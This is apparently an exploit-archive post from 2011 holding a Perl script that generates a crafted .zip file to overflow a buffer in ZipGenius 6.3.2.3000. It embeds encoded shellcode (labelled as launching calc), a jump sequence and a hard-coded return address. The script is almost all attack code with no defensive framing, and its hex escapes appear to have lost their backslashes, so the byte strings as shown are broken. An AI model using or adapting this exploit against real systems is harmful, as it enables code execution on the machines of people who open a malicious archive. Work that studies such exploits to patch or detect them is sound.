ZipGenius 6.3.2.3000 Buffer Overflow

Posted on 09 July 2011
#!/usr/bin/perl
#
#[+]Exploit Title: ZipGenius v6.3.2.3000 .ZIP File Buffer Overflow Exploit
#[+]Date: 0872011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.freewarefiles.com/ZipGenius-V_program_3344.html
#[+]Version: 6.3.2.3000
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
#

use strict;
use warnings;

my $filename = "Exploit.zip";

print "

		ZipGenius v6.3.2.3000 .ZIP File Buffer Overflow Exploit
";
print "		Created by C4SS!0 G0M3S
";
print "		E-mail Louredo_@hotmail.com
";
print "		Site www.exploit-br.org/

";
sleep(2);

my $head = "x50x4Bx03x04x14x00x00".
"x00x00x00xB7xACxCEx34x00x00x00" .
"x00x00x00x00x00x00x00x00" .
"xe4x0f" .
"x00x00x00";

my $head2 = "x50x4Bx01x02x14x00x14".
"x00x00x00x00x00xB7xACxCEx34x00x00x00" .
"x00x00x00x00x00x00x00x00x00".
"xe4x0f".
"x00x00x00x00x00x00x01x00".
"x24x00x00x00x00x00x00x00";

my $head3 = "x50x4Bx05x06x00x00x00".
"x00x01x00x01x00".
"x12x10x00x00".
"x02x10x00x00".
"x00x00";

my $shellcode =
"PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIOJDKJTSICL9MYQ8YRTQ4L".
"41K6IXI81WBLCZKKL6QQC4NUSV8KJMKLIY2JJN5RRQJJKMUKKOO9JZ7Z884POWXJJLXSS8CON5XJW912".
"6WONPTLG14NQQOQPMYLMQOSFQUN9FUSTKXQFKQUPL4OIS4W5U1T3FLHQ2EHPKOYKTDWZSHQMQM7MPBKL".#SHELLCODE WinExec("CALC",0);
"KVW7HKWHCNOP2NOKCHNMGNSO8LYMLS0OJTXRUPYQSFKNYFVBZK47DQVNZFBNGWMNPPQPZQV337XMPXCL".
"VLJ0C3C3CVKMWKRL0GWBLSP1NVKBSOUN4V7L8G8WKYNOJ2NMOOKTYTNLFE1XOFOHXHMNPZ5LRKOOUNLK".
"HLUVXGLMWHP7KWNMXSB644O4CEMVCLPO6QJ9KYJPKXJD4LCTYPOTYVTJTLSQ4OGKMRK8SI7D7BNMO2OB".
"K4BX0S5LKNQX14OM8646B9CZOA";

my $payload = $shellcode;
$payload .= "A" x (1060-length($shellcode));
$payload .= "xebx0bx90x90";
$payload .= pack('V',0x0283119C);
$payload .= "x45" x 10;
$payload .= ("x61" x 13)."x58x50xc3"; #POP EAX / PUSH EAX / RETN

$payload .= "x41" x (4064-length($payload));
$payload = $payload.".txt";
my $zip = $head.$payload.$head2.$payload.$head3;
open(FILE,">$filename") || die "[-]Error:
$!
";
print FILE $zip;
close(FILE);
print "[+] ZIP File Created With Sucess:)
";
sleep(1);
TOP
Malware :

Last 20
Exploits :

Last 20